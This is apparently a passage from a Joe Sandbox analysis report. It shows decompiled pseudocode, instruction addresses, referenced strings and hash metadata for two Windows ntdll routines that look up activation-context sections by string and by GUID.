				intOrPtr* _t130;
				intOrPtr _t135;
				void* _t136;
				intOrPtr _t145;
				intOrPtr _t151;
				intOrPtr* _t164;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t178;
				intOrPtr _t181;
				void* _t190;
				intOrPtr* _t191;
				intOrPtr _t201;
				signed int _t202;
				void* _t203;
				signed char _t213;
				intOrPtr _t214;
				intOrPtr _t217;
				signed int _t219;
				signed int _t224;
				intOrPtr _t228;
				intOrPtr _t229;
				signed int _t234;
				void* _t236;
				signed int _t240;
				void* _t242;

				_t178 =  *[fs:0x18];
				_t242 = (_t240 & 0xfffffff8) - 0x3c;
				_t128 =  *((intOrPtr*)(_t178 + 0x30));
				if( *((intOrPtr*)(_t128 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t128 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t129 = 0xc0150001;
						goto L33;
					}
				} else {
					L1:
					_v48 = 0;
					_v36 = 0xffffffff;
					_v40 = 0;
					if(_a16 == 0) {
						L83:
						_t129 = 0xc000000d;
						goto L33;
					} else {
						_t213 = _a4;
						if((_t213 & 0xfffffff8) != 0) {
							goto L83;
						} else {
							_t130 = _a20;
							if((_t213 & 0x00000007) == 0) {
								if(_t130 != 0) {
									goto L5;
								} else {
									goto L6;
								}
							} else {
								if(_t130 == 0) {
									goto L83;
								} else {
									L5:
									if( *_t130 < 0x24) {
										goto L83;
									} else {
										L6:
										if((_t213 & 0x00000002) == 0) {
											L9:
											if((_t213 & 0x00000004) != 0) {
												if(_t130 + 0x40 <=  *_t130 + _t130) {
													goto L10;
												} else {
													_push(0xc000000d);
													_push("RtlpFindActivationContextSection_CheckParameters");
													_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
													goto L82;
												}
											} else {
												L10:
												_t233 = _a8;
												_v24 = _t213;
												_t214 =  *[fs:0x18];
												_v16 = _a12;
												_v12 = 0;
												_t172 = _v12;
												_t181 =  *((intOrPtr*)(_t214 + 0x30));
												_v28 = 0x18;
												_v8 = 0;
												_v20 = _a8;
												_v60 = 0;
												_v52 = _t214;
												_v44 = _t181;
												while(1) {
													_t135 = _t172;
													if(_t135 != 0) {
														goto L34;
													}
													_t164 =  *((intOrPtr*)(_t214 + 0x1a8));
													if(_t164 == 0) {
														L14:
														_t228 =  *((intOrPtr*)(_t181 + 0x1f8));
														_v60 = 0;
														if(_t228 == 0) {
															L36:
															_t228 =  *((intOrPtr*)(_t181 + 0x200));
															_v60 = 0xfffffffc;
															if(_t228 == 0) {
																L87:
																if(_t172 <= 3) {
																	goto L16;
																} else {
																	_t129 = 0xc00000e5;
																	goto L90;
																}
															} else {
																_t172 = 3;
																_v12 = 3;
																goto L16;
															}
														} else {
															_t172 = 2;
															_v12 = 2;
															goto L16;
														}
													} else {
														_t165 =  *_t164;
														if(_t165 != 0) {
															_t166 =  *((intOrPtr*)(_t165 + 4));
															_v60 = _t166;
															if(_t166 != 0) {
																if(_t166 == 0xfffffffc) {
																	_t228 =  *((intOrPtr*)(_t181 + 0x200));
																	goto L56;
																} else {
																	if(_t166 == 0xfffffffd) {
																		_t228 = "Actx ";
																		goto L57;
																	} else {
																		_t228 =  *((intOrPtr*)(_t166 + 0x10));
																		goto L56;
																	}
																}
															} else {
																L56:
																if(_t228 == 0) {
																	goto L14;
																} else {
																	L57:
																	_t172 = 1;
																	_v12 = 1;
																	L16:
																	if(_t228 == 0) {
																		_t129 = 0xc0150001;
																		L90:
																		_t234 = 0;
																		goto L91;
																	} else {
																		_t129 = E36AFA600(_t228, _t233, _a12,  &_v56,  &_v48);
																		if(_t129 < 0) {
																			_t234 = 0;
																			if(_t129 != 0xc0150001 || _t172 == 3) {
																				goto L19;
																			} else {
																				_t181 = _v44;
																				_t214 = _v52;
																				_t233 = _a8;
																				continue;
																			}
																		} else {
																			_t224 = _v60;
																			_v8 = (0 | _t224 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t224 == 0x00000000;
																			asm("sbb esi, esi");
																			_t234 =  ~(_t224 - 0xfffffffc) & _t224;
																			_t129 = 0;
																			L19:
																			if(_t129 < 0) {
																				L91:
																				if(_t129 < 0) {
																					goto L33;
																				} else {
																					goto L20;
																				}
																			} else {
																				L20:
																				_t173 = _v48;
																				if(_t173 < 0x2c) {
																					L110:
																					_t138 = _v56;
																					goto L111;
																				} else {
																					_t229 = _a20;
																					while(1) {
																						L22:
																						_t138 = _v56;
																						if( *_v56 != 0x64487353) {
																							break;
																						}
																						_t242 = _t242 - 8;
																						_t129 = E36AFA760(_t138, _t173, _a16, _t229,  &_v36,  &_v40);
																						if(_t129 >= 0) {
																							_t83 = _t234 - 1; // -1
																							if((_t83 | 0x00000007) != 0xffffffff) {
																								_t145 =  *((intOrPtr*)(_t234 + 0x14));
																								_v40 = _t145;
																								if(_t145 != 0 && (( *(_t234 + 0x1c) & 0x00000008) == 0 || ( *(_t234 + 0x3c) & 0x00000008) == 0)) {
																									 *((char*)(_t242 + 0xf)) = 0;
																									 *0x36bd91e0(3, _t234,  *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t234 + 0x18)), 0, _t242 + 0xf);
																									_v40();
																									 *(_t234 + 0x1c) =  *(_t234 + 0x1c) | 0x00000008;
																									if( *((char*)(_t242 + 0xf)) != 0) {
																										 *(_t234 + 0x3c) =  *(_t234 + 0x3c) | 0x00000008;
																									}
																								}
																							}
																							if(_t229 == 0) {
																								L67:
																								return 0;
																							} else {
																								_t129 = E36AE4428(_a4, _t229, _t234,  &_v36, _v64,  *((intOrPtr*)(_v64 + 0x24)),  *((intOrPtr*)(_v64 + 0x28)), _t173);
																								if(_t129 < 0) {
																									goto L33;
																								} else {
																									goto L67;
																								}
																							}
																						} else {
																							if(_t129 != 0xc0150008) {
																								L33:
																								return _t129;
																							} else {
																								_t217 =  *[fs:0x18];
																								_t234 = 0;
																								_v68 = 0;
																								_v40 = _t217;
																								_v60 = 0;
																								_v52 =  *((intOrPtr*)(_t217 + 0x30));
																								_t176 = _v20;
																								L26:
																								while(1) {
																									if(_t176 <= 2) {
																										_t190 = _t176 - _t234;
																										if(_t190 == 0) {
																											_t191 =  *((intOrPtr*)(_t217 + 0x1a8));
																											if(_t191 == 0) {
																												goto L68;
																											} else {
																												_t201 =  *_t191;
																												if(_t201 == 0) {
																													goto L68;
																												} else {
																													_t202 =  *((intOrPtr*)(_t201 + 4));
																													_v60 = _t202;
																													if(_t202 == 0) {
																														L102:
																														if(_t151 == 0) {
																															goto L68;
																														} else {
																															goto L103;
																														}
																													} else {
																														if(_t202 != 0xfffffffc) {
																															if(_t202 != 0xfffffffd) {
																																_t151 =  *((intOrPtr*)(_t202 + 0x10));
																																goto L101;
																															} else {
																																_t151 = "Actx ";
																																_v68 = _t151;
																																L103:
																																_t176 = 1;
																																_v20 = 1;
																																goto L28;
																															}
																														} else {
																															_t151 =  *((intOrPtr*)(_v52 + 0x200));
																															L101:
																															_v68 = _t151;
																															goto L102;
																														}
																													}
																												}
																											}
																										} else {
																											_t203 = _t190 - 1;
																											if(_t203 == 0) {
																												L68:
																												_v60 = 0;
																												_t151 =  *((intOrPtr*)(_v52 + 0x1f8));
																												_v68 = _t151;
																												if(_t151 == 0) {
																													goto L44;
																												} else {
																													_t176 = 2;
																													_v20 = 2;
																													goto L28;
																												}
																											} else {
																												if(_t203 != 1) {
																													goto L27;
																												} else {
																													L44:
																													_v60 = 0xfffffffc;
																													_t151 =  *((intOrPtr*)(_v52 + 0x200));
																													_v68 = _t151;
																													if(_t151 == 0) {
																														goto L27;
																													} else {
																														_t176 = 3;
																														_v20 = 3;
																														goto L28;
																													}
																												}
																											}
																										}
																									} else {
																										L27:
																										if(_t176 > 3) {
																											_t129 = 0xc00000e5;
																											goto L30;
																										} else {
																											L28:
																											if(_t151 != 0) {
																												_t129 = E36AFA600(_t151, _a8, _a12,  &_v64,  &_v56);
																												if(_t129 < 0) {
																													_t219 = 0;
																													if(_t129 != 0xc0150001 || _t176 == 3) {
																														goto L48;
																													} else {
																														_t151 = _v68;
																														_t217 = _v40;
																														continue;
																													}
																												} else {
																													_t177 = _v60;
																													_v16 = (0 | _t177 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t177 == 0x00000000;
																													asm("sbb edx, edx");
																													_t219 =  ~(_t177 - 0xfffffffc) & _t177;
																													_t129 = 0;
																													L48:
																													if(_t129 < 0) {
																														goto L31;
																													} else {
																														if(_t219 != 0) {
																															_t125 = _t219 - 1; // -1
																															if((_t125 | 0x00000007) != 0xffffffff &&  *_t219 != 0x7fffffff) {
																																while(1) {
																																	_t236 =  *_t219;
																																	if(_t236 == 0x7fffffff) {
																																		goto L50;
																																	}
																																	asm("lock cmpxchg [edx], ecx");
																																	if(_t236 != _t236) {
																																		continue;
																																	} else {
																																		goto L50;
																																	}
																																	goto L112;
																																}
																															}
																														}
																														L50:
																														_t234 = _t219;
																														goto L51;
																													}
																												}
																											} else {
																												_t129 = 0xc0150001;
																												L30:
																												if(_t129 >= 0) {
																													L51:
																													_t173 = _v56;
																													if(_t173 >= 0x2c) {
																														goto L22;
																													} else {
																														goto L110;
																													}
																												} else {
																													L31:
																													if(_t129 == 0xc0150001) {
																														_t129 = 0xc0150008;
																													}
																													goto L33;
																												}
																											}
																										}
																									}
																									goto L112;
																								}
																							}
																						}
																						goto L112;
																					}
																					L111:
																					_push(_t173);
																					E36B6EF10(0x33, 0, "RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section\n", _t138);
																					_t129 = 0xc0150003;
																					goto L33;
																				}
																			}
																		}
																	}
																}
															}
														} else {
															goto L14;
														}
													}
													goto L112;
													L34:
													_t136 = _t135 - 1;
													if(_t136 == 0) {
														goto L14;
													} else {
														if(_t136 != 1) {
															goto L87;
														} else {
															goto L36;
														}
													}
													goto L112;
												}
											}
										} else {
											if(_t130 + 0x2c >  *_t130 + _t130) {
												_push(0xc000000d);
												_push("RtlpFindActivationContextSection_CheckParameters");
												_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
												L82:
												_push(0);
												_push(0x33);
												E36B6EF10();
												goto L83;
											} else {
												_t130 = _a20;
												goto L9;
											}
										}
									}
								}
							}
						}
					}
				}
				L112:
			}

0x36afa178
0x36afa17f
0x36afa182
0x36afa18f
0x36afa4b4
0x00000000
0x36b477ce
0x36b477ce
0x00000000
0x36b477ce
0x36afa195
0x36afa195
0x36afa199
0x36afa1a1
0x36afa1a9
0x36afa1b1
0x36b477f3
0x36b477f3
0x00000000
0x36afa1b7
0x36afa1b7
0x36afa1c0
0x00000000
0x36afa1c6
0x36afa1c6
0x36afa1cc
0x36afa5dc
0x00000000
0x36afa5e2
0x00000000
0x36afa5e2
0x36afa1d2
0x36afa1d4
0x00000000
0x36afa1da
0x36afa1da
0x36afa1dd
0x00000000
0x36afa1e3
0x36afa1e3
0x36afa1e6
0x36afa1fa
0x36afa1fd
0x36afa5f0
0x00000000
0x36afa5f6
0x36b477fd
0x36b47802
0x36b47807
0x00000000
0x36b47807
0x36afa203
0x36afa203
0x36afa208
0x36afa20b
0x36afa20f
0x36afa216
0x36afa21c
0x36afa224
0x36afa228
0x36afa22b
0x36afa233
0x36afa23b
0x36afa23f
0x36afa243
0x36afa247
0x36afa250
0x36afa252
0x36afa255
0x00000000
0x00000000
0x36afa25b
0x36afa263
0x36afa26f
0x36afa26f
0x36afa277
0x36afa27d
0x36afa3ae
0x36afa3ae
0x36afa3b4
0x36afa3be
0x36b47823
0x36b47826
0x00000000
0x36b4782c
0x36b4782c
0x00000000
0x36b4782c
0x36afa3c4
0x36afa3c4
0x36afa3c9
0x00000000
0x36afa3c9
0x36afa283
0x36afa283
0x36afa288
0x00000000
0x36afa288
0x36afa265
0x36afa265
0x36afa269
0x36afa4bf
0x36afa4c2
0x36afa4c8
0x36afa4e3
0x36b4780e
0x00000000
0x36afa4e9
0x36afa4ec
0x36b47819
0x00000000
0x36afa4f2
0x36afa4f2
0x00000000
0x36afa4f2
0x36afa4ec
0x36afa4ca
0x36afa4ca
0x36afa4cc
0x00000000
0x36afa4d2
0x36afa4d2
0x36afa4d2
0x36afa4d7
0x36afa28c
0x36afa28e
0x36b47833
0x36b47838
0x36b47838
0x00000000
0x36afa294
0x36afa2a5
0x36afa2ac
0x36afa3d2
0x36afa3d9
0x00000000
0x36afa3e8
0x36afa3e8
0x36afa3ec
0x36afa3f0
0x00000000
0x36afa3f0
0x36afa2b2
0x36afa2b2
0x36afa2d2
0x36afa2d6
0x36afa2d8
0x36afa2da
0x36afa2dc
0x36afa2de
0x36b4783a
0x36b4783c
0x00000000
0x36b47842
0x00000000
0x36b47842
0x36afa2e4
0x36afa2e4
0x36afa2e4
0x36afa2eb
0x36b478ed
0x36b478ed
0x00000000
0x36afa2f1
0x36afa2f1
0x36afa300
0x36afa300
0x36afa300
0x36afa30a
0x00000000
0x00000000
0x36afa310
0x36afa325
0x36afa32c
0x36afa4f7
0x36afa500
0x36afa502
0x36afa505
0x36afa50b
0x36afa5a5
0x36afa5b8
0x36afa5be
0x36afa5c2
0x36afa5cb
0x36afa5d1
0x36afa5d1
0x36afa5cb
0x36afa50b
0x36afa523
0x36afa549
0x36afa551
0x36afa525
0x36afa53c
0x36afa543
0x00000000
0x00000000
0x00000000
0x00000000
0x36afa543
0x36afa332
0x36afa337
0x36afa393
0x36afa399
0x36afa339
0x36afa339
0x36afa342
0x36afa344
0x36afa34a
0x36afa34e
0x36afa355
0x36afa359
0x00000000
0x36afa360
0x36afa363
0x36afa3fa
0x36afa3fc
0x36b47847
0x36b4784f
0x00000000
0x36b47855
0x36b47855
0x36b47859
0x00000000
0x36b4785f
0x36b4785f
0x36b47862
0x36b47868
0x36b47892
0x36b47894
0x00000000
0x00000000
0x00000000
0x00000000
0x36b4786a
0x36b4786d
0x36b4787e
0x36b4788b
0x00000000
0x36b47880
0x36b47880
0x36b47885
0x36b4789a
0x36b4789a
0x36b4789f
0x00000000
0x36b4789f
0x36b4786f
0x36b47873
0x36b4788e
0x36b4788e
0x00000000
0x36b4788e
0x36b4786d
0x36b47868
0x36b47859
0x36afa402
0x36afa402
0x36afa405
0x36afa554
0x36afa556
0x36afa55e
0x36afa564
0x36afa56a
0x00000000
0x36afa570
0x36afa570
0x36afa575
0x00000000
0x36afa575
0x36afa40b
0x36afa40e
0x00000000
0x36afa414
0x36afa414
0x36afa418
0x36afa420
0x36afa426
0x36afa42c
0x00000000
0x36afa432
0x36afa432
0x36afa437
0x00000000
0x36afa437
0x36afa42c
0x36afa40e
0x36afa405
0x36afa369
0x36afa369
0x36afa36c
0x36b478e3
0x00000000
0x36afa372
0x36afa372
0x36afa374
0x36afa452
0x36afa459
0x36afa57e
0x36afa585
0x00000000
0x36afa594
0x36afa594
0x36afa598
0x00000000
0x36afa598
0x36afa45f
0x36afa45f
0x36afa47f
0x36afa483
0x36afa485
0x36afa487
0x36afa489
0x36afa48b
0x00000000
0x36afa491
0x36afa493
0x36b478a8
0x36b478b1
0x36b478c3
0x36b478c3
0x36b478cb
0x00000000
0x00000000
0x36b478d6
0x36b478dc
0x00000000
0x36b478de
0x00000000
0x36b478de
0x00000000
0x36b478dc
0x36b478c3
0x36b478b1
0x36afa499
0x36afa499
0x00000000
0x36afa499
0x36afa48b
0x36afa37a
0x36afa37a
0x36afa37f
0x36afa381
0x36afa49b
0x36afa49b
0x36afa4a2
0x00000000
0x36afa4a8
0x00000000
0x36afa4a8
0x36afa387
0x36afa387
0x36afa38c
0x36afa38e
0x36afa38e
0x00000000
0x36afa38c
0x36afa381
0x36afa374
0x36afa36c
0x00000000
0x36afa363
0x36afa360
0x36afa337
0x00000000
0x36afa32c
0x36b478f1
0x36b478f1
0x36b478fc
0x36b47904
0x00000000
0x36b47904
0x36afa2eb
0x36afa2de
0x36afa2ac
0x36afa28e
0x36afa4cc
0x00000000
0x00000000
0x00000000
0x36afa269
0x00000000
0x36afa39c
0x36afa39c
0x36afa39f
0x00000000
0x36afa3a5
0x36afa3a8
0x00000000
0x00000000
0x00000000
0x00000000
0x36afa3a8
0x00000000
0x36afa39f
0x36afa250
0x36afa1e8
0x36afa1f1
0x36b477d8
0x36b477dd
0x36b477e2
0x36b477e7
0x36b477e7
0x36b477e9
0x36b477eb
0x00000000
0x36afa1f7
0x36afa1f7
0x00000000
0x36afa1f7
0x36afa1f1
0x36afa1e6
0x36afa1dd
0x36afa1d4
0x36afa1cc
0x36afa1c0
0x36afa1b1
0x00000000

Strings

RtlpFindActivationContextSection_CheckParameters, xrefs: 36B477DD, 36B47802
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36B47807
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36B477E2
SsHd, xrefs: 36AFA304
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 36B478F3
Actx , xrefs: 36B47819, 36B47880

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 51114384e3bd9614951587db19975918110df9748622dae363ed11c071d98984
Instruction ID: 48aa72945982067c19a9e960f436f7397568fb9a727f8c1c8f0bc5133610de09
Opcode Fuzzy Hash: 51114384e3bd9614951587db19975918110df9748622dae363ed11c071d98984
Instruction Fuzzy Hash: 46E1BF78A24311CFE711CE26CC8479AB7E1AB84758F504A2DFE55CF290DBB2D845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 36AFD690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372
timeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E36AFD690(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v56;
				char _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				char _v88;
				signed int _v92;
				char _v93;
				signed int _v104;
				char _v117;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t150;
				char _t158;
				intOrPtr _t160;
				intOrPtr _t163;
				intOrPtr* _t164;
				intOrPtr _t170;
				signed int _t171;
				void* _t172;
				signed int _t195;
				intOrPtr* _t201;
				signed int _t205;
				intOrPtr* _t209;
				void* _t210;
				intOrPtr _t211;
				intOrPtr _t213;
				signed int _t214;
				intOrPtr* _t215;
				intOrPtr _t217;
				intOrPtr _t225;
				intOrPtr _t227;
				intOrPtr _t228;
				void* _t233;
				intOrPtr* _t234;
				signed int _t242;
				void* _t246;
				signed int _t247;
				signed int _t252;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr _t255;
				signed int _t256;
				signed int _t258;

				_t258 = (_t256 & 0xfffffff8) - 0x5c;
				_v8 =  *0x36bdb370 ^ _t258;
				_t217 =  *[fs:0x18];
				_t241 = _a16;
				_t209 = _a20;
				_t150 =  *((intOrPtr*)(_t217 + 0x30));
				_t252 = _a8;
				_v84 = _t241;
				_v80 = _t209;
				if( *((intOrPtr*)(_t150 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t150 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t151 = 0xc0150001;
						L24:
						_pop(_t246);
						_pop(_t253);
						_pop(_t210);
						return E36B24B50(_t151, _t210, _v8 ^ _t258, _t241, _t246, _t253);
					}
				}
				L1:
				_v88 = 0;
				if(_t241 == 0) {
					L49:
					_t151 = 0xc000000d;
					goto L24;
				}
				_t241 = _a4;
				if((_t241 & 0xfffffff8) != 0) {
					goto L49;
				}
				if((_t241 & 0x00000007) == 0) {
					if(_t209 != 0) {
						L5:
						if( *_t209 < 0x24) {
							goto L49;
						}
						L6:
						if((_t241 & 0x00000002) != 0) {
							if(_t209 + 0x2c <=  *_t209 + _t209) {
								goto L7;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							L48:
							_push(0);
							_push(0x33);
							E36B6EF10();
							_t258 = _t258 + 0x14;
							goto L49;
						}
						L7:
						if((_t241 & 0x00000004) != 0) {
							if(_t209 + 0x40 <=  *_t209 + _t209) {
								goto L8;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							goto L48;
						}
						L8:
						_t241 =  &_v76;
						_v48 = _a12;
						_v60 = 0x18;
						_v56 = 0;
						_v52 = _t252;
						_v40 = 0;
						_v64 = 0;
						_v44 = 0;
						if(E36AFD580( &_v60,  &_v76,  &_v88,  &_v64) < 0) {
							goto L24;
						}
						_t151 = 0;
						if(0 < 0) {
							goto L24;
						}
						_t158 = _v88;
						if(_t158 < 0x28) {
							L34:
							_t254 = _v76;
							L91:
							_push(_t158);
							E36B6EF10(0x33, 0, "RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section\n", _t254);
							_t258 = _t258 + 0x14;
							_t151 = 0xc0150003;
							goto L24;
						}
						_t247 = _v64;
						while(1) {
							L12:
							_t254 = _v76;
							if( *_t254 != 0x64487347) {
								goto L91;
							}
							_t211 =  *((intOrPtr*)(_t254 + 0x14));
							_t160 = 1;
							if(_t211 == 0) {
								L19:
								_t225 =  *[fs:0x18];
								_t255 = _v44;
								_v92 = 0;
								_t247 = 0;
								_v68 = _t225;
								_t241 =  *(_t225 + 0x30);
								_v72 = _t241;
								L20:
								while(1) {
									if(_t255 <= 2) {
										_t163 = _t255;
										if(_t163 == 0) {
											_t164 =  *((intOrPtr*)(_t225 + 0x1a8));
											if(_t164 == 0) {
												L43:
												_t213 =  *((intOrPtr*)(_t241 + 0x1f8));
												_v92 = 0;
												if(_t213 == 0) {
													L28:
													_t213 =  *((intOrPtr*)(_t241 + 0x200));
													_v92 = 0xfffffffc;
													if(_t213 == 0) {
														goto L21;
													}
													_t255 = 3;
													_v44 = 3;
													L22:
													if(_t213 != 0) {
														_t241 = _v52;
														_t151 = E36AFA600(_t213, _v52, _v48,  &_v76,  &_v88);
														if(_t151 < 0) {
															if(_t151 != 0xc0150001 || _t255 == 3) {
																L32:
																if(_t151 < 0) {
																	if(_t151 != 0xc0150001) {
																		goto L24;
																	}
																	goto L23;
																}
																_t158 = _v88;
																if(_t158 >= 0x28) {
																	goto L12;
																}
																goto L34;
															} else {
																_t225 = _v68;
																_t241 = _v72;
																continue;
															}
														}
														_t241 = _v92;
														_v40 = (0 | _t241 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t241 == 0x00000000;
														asm("sbb edi, edi");
														_t247 =  ~(_t241 - 0xfffffffc) & _t241;
														_t151 = 0;
														goto L32;
													}
													L23:
													_t151 = 0xc0150008;
													goto L24;
												}
												_t255 = 2;
												_v44 = 2;
												goto L22;
											}
											_t170 =  *_t164;
											if(_t170 == 0) {
												goto L43;
											}
											_t171 =  *((intOrPtr*)(_t170 + 4));
											_v92 = _t171;
											if(_t171 == 0) {
												L83:
												if(_t213 == 0) {
													goto L43;
												}
												L84:
												_t255 = 1;
												_v44 = 1;
												goto L22;
											}
											if(_t171 != 0xfffffffc) {
												if(_t171 != 0xfffffffd) {
													_t213 =  *((intOrPtr*)(_t171 + 0x10));
													goto L83;
												}
												_t213 = "Actx ";
												goto L84;
											}
											_t213 =  *((intOrPtr*)(_t241 + 0x200));
											goto L83;
										}
										_t172 = _t163 - 1;
										if(_t172 == 0) {
											goto L43;
										}
										if(_t172 != 1) {
											goto L21;
										}
										goto L28;
									}
									L21:
									if(_t255 > 3) {
										_t151 = 0xc00000e5;
										goto L24;
									}
									goto L22;
								}
							}
							if( *((intOrPtr*)(_t254 + 8)) != 1) {
								_t160 = 0;
							}
							_t227 =  *((intOrPtr*)(_t254 + 0x1c));
							if(_t227 != 0) {
								if(_t160 == 0) {
									goto L16;
								}
								_v92 = 0;
								_t233 =  *((intOrPtr*)(_t227 + _t254 + 4)) +  *_v84 %  *(_t227 + _t254) * 8;
								_t234 = _t233 + _t254;
								_t201 =  *((intOrPtr*)(_t233 + _t254 + 4)) + _t254;
								_v72 = _t234;
								if( *_t234 <= 0) {
									goto L19;
								} else {
									goto L54;
								}
								while(1) {
									L54:
									_t214 =  *_t201 + _t254;
									_v68 = _t201 + 4;
									if(E36B38050(_t214, _v84, ?str?) == 0x10) {
										goto L18;
									}
									_t205 = _v92 + 1;
									_v92 = _t205;
									_t201 = _v68;
									if(_t205 <  *_v72) {
										continue;
									}
									goto L19;
								}
							} else {
								L16:
								_t228 =  *((intOrPtr*)(_t254 + 0x18));
								if(( *(_t254 + 0x10) & 0x00000001) == 0) {
									_t174 = _t228 + _t254;
									_v92 = _t228 + _t254;
									while(E36B38050(_t174, _v84, ?str?) != 0x10) {
										_t174 = _v92 + 0x1c;
										_v92 = _v92 + 0x1c;
										_t211 = _t211 - 1;
										if(_t211 != 0) {
											continue;
										}
										goto L19;
									}
									_t214 = _v92;
									L18:
									if(_t214 != 0) {
										if( *((intOrPtr*)(_t214 + 0x10)) == 0) {
											goto L19;
										}
										_t241 = _v80;
										if(_t241 != 0) {
											 *((intOrPtr*)(_t241 + 4)) =  *((intOrPtr*)(_t254 + 0xc));
											 *((intOrPtr*)(_t241 + 8)) =  *((intOrPtr*)(_t214 + 0x10)) + _t254;
											 *((intOrPtr*)(_t241 + 0xc)) =  *((intOrPtr*)(_t214 + 0x14));
											if(_t241 + 0x28 <=  *_t241 + _t241) {
												 *((intOrPtr*)(_t241 + 0x24)) =  *((intOrPtr*)(_t214 + 0x18));
											}
										}
										if((_t247 - 0x00000001 | 0x00000007) != 0xffffffff) {
											_t215 =  *((intOrPtr*)(_t247 + 0x14));
											if(_t215 != 0 && (( *(_t247 + 0x1c) & 0x00000008) == 0 || ( *(_t247 + 0x3c) & 0x00000008) == 0)) {
												_v93 = 0;
												 *0x36bd91e0(3, _t247,  *((intOrPtr*)(_t247 + 0x10)),  *((intOrPtr*)(_t247 + 0x18)), 0,  &_v93);
												 *_t215();
												 *(_t247 + 0x1c) =  *(_t247 + 0x1c) | 0x00000008;
												_t241 = _v104;
												if(_v117 != 0) {
													 *(_t247 + 0x3c) =  *(_t247 + 0x3c) | 0x00000008;
												}
											}
										}
										if(_t241 == 0 || E36AE4428(_a4, _t241, _t247,  &_v60, _t254,  *((intOrPtr*)(_t254 + 0x20)),  *((intOrPtr*)(_t254 + 0x24)), _v88) >= 0) {
											_t151 = 0;
										}
										goto L24;
									}
									goto L19;
								}
								_t242 = _v84;
								_v36 =  *_t242;
								_v32 =  *((intOrPtr*)(_t242 + 4));
								_v28 =  *((intOrPtr*)(_t242 + 8));
								_v24 =  *((intOrPtr*)(_t242 + 0xc));
								_t195 = E36B28170( &_v36, _t228 + _t254, _t211, "true", E36ADB600);
								_t258 = _t258 + 0x14;
								_t214 = _t195;
							}
							goto L18;
						}
						goto L91;
					}
					goto L6;
				}
				if(_t209 == 0) {
					goto L49;
				}
				goto L5;
			}

0x36afd698
0x36afd6a2
0x36afd6a6
0x36afd6ad
0x36afd6b1
0x36afd6b4
0x36afd6b8
0x36afd6c3
0x36afd6c7
0x36afd6cb
0x36afd90e
0x00000000
0x36b4913f
0x36b4913f
0x36afd847
0x36afd84b
0x36afd84c
0x36afd84d
0x36afd858
0x36afd858
0x36afd90e
0x36afd6d1
0x36afd6d1
0x36afd6db
0x36b49164
0x36b49164
0x00000000
0x36b49164
0x36afd6e1
0x36afd6ea
0x00000000
0x00000000
0x36afd6f3
0x36afd8fc
0x36afd701
0x36afd704
0x00000000
0x00000000
0x36afd70a
0x36afd70d
0x36afd922
0x00000000
0x00000000
0x36b49149
0x36b4914e
0x36b49153
0x36b49158
0x36b49158
0x36b4915a
0x36b4915c
0x36b49161
0x00000000
0x36b49161
0x36afd713
0x36afd716
0x36afd936
0x00000000
0x00000000
0x36b4916e
0x36b49173
0x36b49178
0x00000000
0x36b49178
0x36afd71c
0x36afd71f
0x36afd723
0x36afd72f
0x36afd73c
0x36afd745
0x36afd749
0x36afd751
0x36afd759
0x36afd768
0x00000000
0x00000000
0x36afd76e
0x36afd772
0x00000000
0x00000000
0x36afd778
0x36afd77f
0x36afd8f1
0x36afd8f1
0x36b49370
0x36b49370
0x36b4937b
0x36b49380
0x36b49383
0x00000000
0x36b49383
0x36afd785
0x36afd790
0x36afd790
0x36afd790
0x36afd79a
0x00000000
0x00000000
0x36afd7a0
0x36afd7a3
0x36afd7a7
0x36afd80d
0x36afd80d
0x36afd816
0x36afd81c
